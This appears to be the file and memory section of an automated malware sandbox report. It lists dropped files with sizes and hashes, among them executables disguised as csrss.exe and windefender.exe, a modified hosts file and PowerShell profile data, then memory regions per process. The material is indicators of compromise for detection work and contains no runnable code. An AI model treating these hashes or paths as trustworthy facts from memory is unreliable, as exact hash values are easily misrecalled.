                                                                          931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                          Filesize

                                                                          19KB

                                                                          MD5

                                                                          2c3e9e36e5843fcf8c35936238ba2ae2

                                                                          SHA1

                                                                          a8dff435c309147625cc1b54aa0107dc0d02ca6d

                                                                          SHA256

                                                                          013f7ec5e5cd1ea648eee1124f23aeac4df92c4228c3af6c8aae265f6290a5dc

                                                                          SHA512

                                                                          a27a45bd213800a2cbc8478fe82e31fb4ef76857be670b9a7005f428501255cb8418c57d98e3b9ec8e03323c7e47513b5a5324ab43269508948cf5d3b7fbe7a9

                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                          Filesize

                                                                          19KB

                                                                          MD5

                                                                          2c3e9e36e5843fcf8c35936238ba2ae2

                                                                          SHA1

                                                                          a8dff435c309147625cc1b54aa0107dc0d02ca6d

                                                                          SHA256

                                                                          013f7ec5e5cd1ea648eee1124f23aeac4df92c4228c3af6c8aae265f6290a5dc

                                                                          SHA512

                                                                          a27a45bd213800a2cbc8478fe82e31fb4ef76857be670b9a7005f428501255cb8418c57d98e3b9ec8e03323c7e47513b5a5324ab43269508948cf5d3b7fbe7a9

                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                          Filesize

                                                                          19KB

                                                                          MD5

                                                                          368a95074d033b0b9af119b6cb3efd3e

                                                                          SHA1

                                                                          789dd497948b598557f29a4e2aa1e04d2c35c3a0

                                                                          SHA256

                                                                          42a11107be577681515c4a58058f5d85d7bdf6f7a6a51e87353bac1316f482d7

                                                                          SHA512

                                                                          393edb486b792f7385041abe7bf466f3eed2aec87ea5d710c572028fe8e93acd7f372a024119ea438802156ab0dc9b001e1a93f711e9371a68737b5b0d6a78af

                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                          Filesize

                                                                          19KB

                                                                          MD5

                                                                          368a95074d033b0b9af119b6cb3efd3e

                                                                          SHA1

                                                                          789dd497948b598557f29a4e2aa1e04d2c35c3a0

                                                                          SHA256

                                                                          42a11107be577681515c4a58058f5d85d7bdf6f7a6a51e87353bac1316f482d7

                                                                          SHA512

                                                                          393edb486b792f7385041abe7bf466f3eed2aec87ea5d710c572028fe8e93acd7f372a024119ea438802156ab0dc9b001e1a93f711e9371a68737b5b0d6a78af

                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                          Filesize

                                                                          19KB

                                                                          MD5

                                                                          5718e8164fbb7e6ded4cfbdc0a52da9e

                                                                          SHA1

                                                                          6850a7cc9ec92558db75c96be2c3a02fcb84eb1c

                                                                          SHA256

                                                                          06a9b72aa20ea3d838ffb009272a3ffd08ece4375b9c4b0946b0c2fd9bc36ae9

                                                                          SHA512

                                                                          f053c0673e6ef8b42e4a02d8dbed55991629610650f2feb5191236a54330c357518a6eed9444eeafd746b38d65a10e8aabdb86f49d2c3c69a517feff62c717f0

                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                          Filesize

                                                                          19KB

                                                                          MD5

                                                                          5718e8164fbb7e6ded4cfbdc0a52da9e

                                                                          SHA1

                                                                          6850a7cc9ec92558db75c96be2c3a02fcb84eb1c

                                                                          SHA256

                                                                          06a9b72aa20ea3d838ffb009272a3ffd08ece4375b9c4b0946b0c2fd9bc36ae9

                                                                          SHA512

                                                                          f053c0673e6ef8b42e4a02d8dbed55991629610650f2feb5191236a54330c357518a6eed9444eeafd746b38d65a10e8aabdb86f49d2c3c69a517feff62c717f0

                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                          Filesize

                                                                          19KB

                                                                          MD5

                                                                          0ca1b17a1dfc08a3c878df3160df62ad

                                                                          SHA1

                                                                          51fedfe3f9b8ace624c28dee47d6e7f9f21468ed

                                                                          SHA256

                                                                          c032ecad8f4ee2926220e6278bd7165b3243cfc6108f9ce33ebd562efabf7c32

                                                                          SHA512

                                                                          c1c8252f1abc1409448e7cada9aac19ebbe9ce426c4f21195833a04beadc522862aace1666bb55a5ac9f3d2cb71d0e1f07bfb37c710bb1dd8aa9e01d66b55cda

                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                          Filesize

                                                                          19KB

                                                                          MD5

                                                                          9c56708ca40b4e139ae163933545d467

                                                                          SHA1

                                                                          a63a5947a288ba6d79ba2a12873f797e88a7efe9

                                                                          SHA256

                                                                          07486fbed60ab643154e4cfabba33e90c477ad09ee55c4d490bbbb8310ae3e76

                                                                          SHA512

                                                                          932e5285cb8cea70684ab845b1b9e94867f9ae742d9a4c62df77be3abbdcc4452c66dae1a2b56e38f35afb27412b58c7ecca5c1c10176dd0a9b5368e25aed014

                                                                        • C:\Windows\System32\drivers\etc\hosts

                                                                          Filesize

                                                                          3KB

                                                                          MD5

                                                                          00930b40cba79465b7a38ed0449d1449

                                                                          SHA1

                                                                          4b25a89ee28b20ba162f23772ddaf017669092a5

                                                                          SHA256

                                                                          eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                                                                          SHA512

                                                                          cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                                                                        • C:\Windows\rss\csrss.exe

                                                                          Filesize

                                                                          4.2MB

                                                                          MD5

                                                                          22afc63b2652666dc63cd02b839aa8e3

                                                                          SHA1

                                                                          125822ff34a87d00b9c251a55ae01c599eafd359

                                                                          SHA256

                                                                          7cf9859523c28c599281990e446a30938d913d6b3598cf78587000063d99026c

                                                                          SHA512

                                                                          93da608a7fcfed71b55882f467b62a1667cbbac8c344bf8f9840aeb7766fccef3ea2d5921116a5fa540d556f1071a38b220e513d5cec0c6376f7629426067210

                                                                        • C:\Windows\rss\csrss.exe

                                                                          Filesize

                                                                          4.2MB

                                                                          MD5

                                                                          22afc63b2652666dc63cd02b839aa8e3

                                                                          SHA1

                                                                          125822ff34a87d00b9c251a55ae01c599eafd359

                                                                          SHA256

                                                                          7cf9859523c28c599281990e446a30938d913d6b3598cf78587000063d99026c

                                                                          SHA512

                                                                          93da608a7fcfed71b55882f467b62a1667cbbac8c344bf8f9840aeb7766fccef3ea2d5921116a5fa540d556f1071a38b220e513d5cec0c6376f7629426067210

                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                          Filesize

                                                                          4KB

                                                                          MD5

                                                                          bdb25c22d14ec917e30faf353826c5de

                                                                          SHA1

                                                                          6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                                                                          SHA256

                                                                          e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                                                                          SHA512

                                                                          b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          b42c70c1dbf0d1d477ec86902db9e986

                                                                          SHA1

                                                                          1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                                                                          SHA256

                                                                          8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                                                                          SHA512

                                                                          57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                                                                        • C:\Windows\windefender.exe

                                                                          Filesize

                                                                          2.0MB

                                                                          MD5

                                                                          8e67f58837092385dcf01e8a2b4f5783

                                                                          SHA1

                                                                          012c49cfd8c5d06795a6f67ea2baf2a082cf8625

                                                                          SHA256

                                                                          166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

                                                                          SHA512

                                                                          40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

                                                                        • C:\Windows\windefender.exe

                                                                          Filesize

                                                                          2.0MB

                                                                          MD5

                                                                          8e67f58837092385dcf01e8a2b4f5783

                                                                          SHA1

                                                                          012c49cfd8c5d06795a6f67ea2baf2a082cf8625

                                                                          SHA256

                                                                          166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

                                                                          SHA512

                                                                          40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

                                                                        • C:\Windows\windefender.exe

                                                                          Filesize

                                                                          2.0MB

                                                                          MD5

                                                                          8e67f58837092385dcf01e8a2b4f5783

                                                                          SHA1

                                                                          012c49cfd8c5d06795a6f67ea2baf2a082cf8625

                                                                          SHA256

                                                                          166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

                                                                          SHA512

                                                                          40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

                                                                        • memory/660-197-0x0000000003DD0000-0x0000000003E68000-memory.dmp

                                                                          Filesize

                                                                          608KB

                                                                        • memory/744-5-0x0000000000400000-0x0000000002288000-memory.dmp

                                                                          Filesize

                                                                          30.5MB

                                                                        • memory/744-1-0x0000000002530000-0x0000000002630000-memory.dmp

                                                                          Filesize

                                                                          1024KB

                                                                        • memory/744-2-0x0000000000400000-0x0000000002288000-memory.dmp

                                                                          Filesize

                                                                          30.5MB

                                                                        • memory/744-3-0x0000000003FD0000-0x0000000003FDB000-memory.dmp

                                                                          Filesize

                                                                          44KB

                                                                        • memory/800-271-0x0000000000400000-0x0000000002288000-memory.dmp

                                                                          Filesize

                                                                          30.5MB

                                                                        • memory/800-270-0x00000000023A0000-0x00000000023AB000-memory.dmp

                                                                          Filesize

                                                                          44KB

                                                                        • memory/800-269-0x00000000024D0000-0x00000000025D0000-memory.dmp

                                                                          Filesize

                                                                          1024KB

                                                                        • memory/856-355-0x0000000000400000-0x000000000047F000-memory.dmp

                                                                          Filesize

                                                                          508KB

                                                                        • memory/1288-295-0x00007FF75F480000-0x00007FF75FA21000-memory.dmp

                                                                          Filesize

                                                                          5.6MB

                                                                        • memory/1376-207-0x00000000736C0000-0x0000000073E70000-memory.dmp

                                                                          Filesize

                                                                          7.7MB

                                                                        • memory/1376-150-0x0000000000B50000-0x0000000001A7A000-memory.dmp

                                                                          Filesize

                                                                          15.2MB

                                                                        • memory/1376-148-0x00000000736C0000-0x0000000073E70000-memory.dmp

                                                                          Filesize

                                                                          7.7MB

                                                                        • memory/1456-214-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/1456-204-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/1456-203-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/1532-48-0x0000000007BB0000-0x0000000007BBA000-memory.dmp

                                                                          Filesize

                                                                          40KB

                                                                        • memory/1532-346-0x0000000009C70000-0x0000000009CC0000-memory.dmp

                                                                          Filesize

                                                                          320KB

                                                                        • memory/1532-51-0x0000000007C90000-0x0000000007CA2000-memory.dmp

                                                                          Filesize

                                                                          72KB

                                                                        • memory/1532-273-0x0000000009610000-0x00000000097D2000-memory.dmp

                                                                          Filesize

                                                                          1.8MB

                                                                        • memory/1532-50-0x0000000007D60000-0x0000000007E6A000-memory.dmp

                                                                          Filesize

                                                                          1.0MB

                                                                        • memory/1532-49-0x0000000008AA0000-0x00000000090B8000-memory.dmp

                                                                          Filesize

                                                                          6.1MB

                                                                        • memory/1532-358-0x00000000736C0000-0x0000000073E70000-memory.dmp

                                                                          Filesize

                                                                          7.7MB

                                                                        • memory/1532-143-0x00000000085B0000-0x0000000008616000-memory.dmp

                                                                          Filesize

                                                                          408KB

                                                                        • memory/1532-54-0x0000000007E70000-0x0000000007EBC000-memory.dmp

                                                                          Filesize

                                                                          304KB

                                                                        • memory/1532-36-0x0000000000400000-0x000000000043E000-memory.dmp

                                                                          Filesize

                                                                          248KB

                                                                        • memory/1532-47-0x0000000007BD0000-0x0000000007BE0000-memory.dmp

                                                                          Filesize

                                                                          64KB

                                                                        • memory/1532-145-0x00000000736C0000-0x0000000073E70000-memory.dmp

                                                                          Filesize

                                                                          7.7MB

                                                                        • memory/1532-46-0x00000000079C0000-0x0000000007A52000-memory.dmp

                                                                          Filesize

                                                                          584KB

                                                                        • memory/1532-44-0x00000000736C0000-0x0000000073E70000-memory.dmp

                                                                          Filesize

                                                                          7.7MB

                                                                        • memory/1532-45-0x0000000007ED0000-0x0000000008474000-memory.dmp

                                                                          Filesize

                                                                          5.6MB

                                                                        • memory/1532-52-0x0000000007CF0000-0x0000000007D2C000-memory.dmp

                                                                          Filesize

                                                                          240KB

                                                                        • memory/1532-149-0x0000000007BD0000-0x0000000007BE0000-memory.dmp

                                                                          Filesize

                                                                          64KB

                                                                        • memory/1532-276-0x0000000009D10000-0x000000000A23C000-memory.dmp

                                                                          Filesize

                                                                          5.2MB

                                                                        • memory/1684-293-0x0000000000400000-0x000000000266D000-memory.dmp

                                                                          Filesize

                                                                          34.4MB

                                                                        • memory/1684-278-0x0000000000400000-0x000000000266D000-memory.dmp

                                                                          Filesize

                                                                          34.4MB

                                                                        • memory/1684-275-0x00000000047F0000-0x00000000050DB000-memory.dmp

                                                                          Filesize

                                                                          8.9MB

                                                                        • memory/1684-272-0x00000000043F0000-0x00000000047EF000-memory.dmp

                                                                          Filesize

                                                                          4.0MB

                                                                        • memory/1688-107-0x0000000002E60000-0x0000000002F4F000-memory.dmp

                                                                          Filesize

                                                                          956KB

                                                                        • memory/1688-127-0x0000000002E60000-0x0000000002F4F000-memory.dmp

                                                                          Filesize

                                                                          956KB

                                                                        • memory/1688-129-0x0000000002E60000-0x0000000002F4F000-memory.dmp

                                                                          Filesize

                                                                          956KB

                                                                        • memory/1688-35-0x0000000010000000-0x00000000102BE000-memory.dmp

                                                                          Filesize

                                                                          2.7MB

                                                                        • memory/1688-135-0x0000000002E60000-0x0000000002F4F000-memory.dmp

                                                                          Filesize

                                                                          956KB

                                                                        • memory/1688-43-0x0000000000EA0000-0x0000000000EA6000-memory.dmp

                                                                          Filesize

                                                                          24KB

                                                                        • memory/1688-88-0x0000000002D50000-0x0000000002E56000-memory.dmp

                                                                          Filesize

                                                                          1.0MB

                                                                        • memory/2016-62-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/2016-284-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/2016-64-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/2016-68-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/2016-58-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/2016-186-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/2232-236-0x00000000023A0000-0x00000000023A9000-memory.dmp

                                                                          Filesize

                                                                          36KB

                                                                        • memory/2232-246-0x0000000002560000-0x0000000002660000-memory.dmp

                                                                          Filesize

                                                                          1024KB

                                                                        • memory/2952-280-0x0000000004450000-0x0000000004855000-memory.dmp

                                                                          Filesize

                                                                          4.0MB

                                                                        • memory/2952-296-0x0000000000400000-0x000000000266E000-memory.dmp

                                                                          Filesize

                                                                          34.4MB

                                                                        • memory/2952-292-0x0000000000400000-0x000000000266E000-memory.dmp

                                                                          Filesize

                                                                          34.4MB

                                                                        • memory/3116-221-0x0000000001200000-0x000000000126B000-memory.dmp

                                                                          Filesize

                                                                          428KB

                                                                        • memory/3116-216-0x0000000001200000-0x000000000126B000-memory.dmp

                                                                          Filesize

                                                                          428KB

                                                                        • memory/3116-28-0x0000000004120000-0x000000000423B000-memory.dmp

                                                                          Filesize

                                                                          1.1MB

                                                                        • memory/3116-25-0x0000000003F70000-0x0000000004009000-memory.dmp

                                                                          Filesize

                                                                          612KB

                                                                        • memory/3116-277-0x0000000001200000-0x000000000126B000-memory.dmp

                                                                          Filesize

                                                                          428KB

                                                                        • memory/3116-220-0x0000000001270000-0x00000000012E5000-memory.dmp

                                                                          Filesize

                                                                          468KB

                                                                        • memory/3124-268-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                          Filesize

                                                                          36KB

                                                                        • memory/3124-289-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                          Filesize

                                                                          36KB

                                                                        • memory/3124-259-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                          Filesize

                                                                          36KB

                                                                        • memory/3128-4-0x00000000030A0000-0x00000000030B6000-memory.dmp

                                                                          Filesize

                                                                          88KB

                                                                        • memory/3128-285-0x00000000012C0000-0x00000000012D6000-memory.dmp

                                                                          Filesize

                                                                          88KB

                                                                        • memory/3272-228-0x0000000000480000-0x0000000000487000-memory.dmp

                                                                          Filesize

                                                                          28KB

                                                                        • memory/3272-227-0x00000000001F0000-0x00000000001FC000-memory.dmp

                                                                          Filesize

                                                                          48KB

                                                                        • memory/3272-230-0x00000000001F0000-0x00000000001FC000-memory.dmp

                                                                          Filesize

                                                                          48KB

                                                                        • memory/3596-55-0x00000000025C0000-0x0000000002659000-memory.dmp

                                                                          Filesize

                                                                          612KB

                                                                        • memory/3596-56-0x00000000040C0000-0x00000000041DB000-memory.dmp

                                                                          Filesize

                                                                          1.1MB

                                                                        • memory/3820-42-0x0000000000400000-0x0000000002284000-memory.dmp

                                                                          Filesize

                                                                          30.5MB

                                                                        • memory/3820-34-0x0000000003ED0000-0x0000000003EEB000-memory.dmp

                                                                          Filesize

                                                                          108KB

                                                                        • memory/3820-65-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                          Filesize

                                                                          972KB

                                                                        • memory/3820-33-0x00000000023D0000-0x00000000024D0000-memory.dmp

                                                                          Filesize

                                                                          1024KB

                                                                        • memory/3820-294-0x0000000000400000-0x0000000002284000-memory.dmp

                                                                          Filesize

                                                                          30.5MB

                                                                        • memory/3820-264-0x0000000000400000-0x0000000002284000-memory.dmp

                                                                          Filesize

                                                                          30.5MB

                                                                        • memory/3820-134-0x00000000023D0000-0x00000000024D0000-memory.dmp

                                                                          Filesize

                                                                          1024KB

                                                                        • memory/3820-133-0x0000000000400000-0x0000000002284000-memory.dmp

                                                                          Filesize

                                                                          30.5MB

                                                                        • memory/3820-106-0x0000000000400000-0x0000000002284000-memory.dmp

                                                                          Filesize

                                                                          30.5MB

                                                                        • memory/3828-219-0x0000000004FA0000-0x0000000004FA1000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/3828-324-0x0000000005290000-0x0000000005291000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/3828-321-0x00000000736C0000-0x0000000073E70000-memory.dmp

                                                                          Filesize

                                                                          7.7MB

                                                                        • memory/3828-297-0x0000000005240000-0x000000000525C000-memory.dmp

                                                                          Filesize

                                                                          112KB

                                                                        • memory/3828-215-0x00000000052A0000-0x000000000533C000-memory.dmp

                                                                          Filesize

                                                                          624KB

                                                                        • memory/3828-192-0x00000000736C0000-0x0000000073E70000-memory.dmp

                                                                          Filesize

                                                                          7.7MB

                                                                        • memory/3828-209-0x00000000050F0000-0x0000000005100000-memory.dmp

                                                                          Filesize

                                                                          64KB

                                                                        • memory/3828-193-0x00000000001E0000-0x00000000006F6000-memory.dmp

                                                                          Filesize

                                                                          5.1MB

                                                                        • memory/3828-328-0x00000000050F0000-0x0000000005100000-memory.dmp

                                                                          Filesize

                                                                          64KB

                                                                        • memory/3828-337-0x00000000736C0000-0x0000000073E70000-memory.dmp

                                                                          Filesize

                                                                          7.7MB

                                                                        • memory/4328-136-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/4328-57-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/4328-60-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/4328-63-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/4328-66-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/4412-330-0x0000000002540000-0x00000000025DE000-memory.dmp

                                                                          Filesize

                                                                          632KB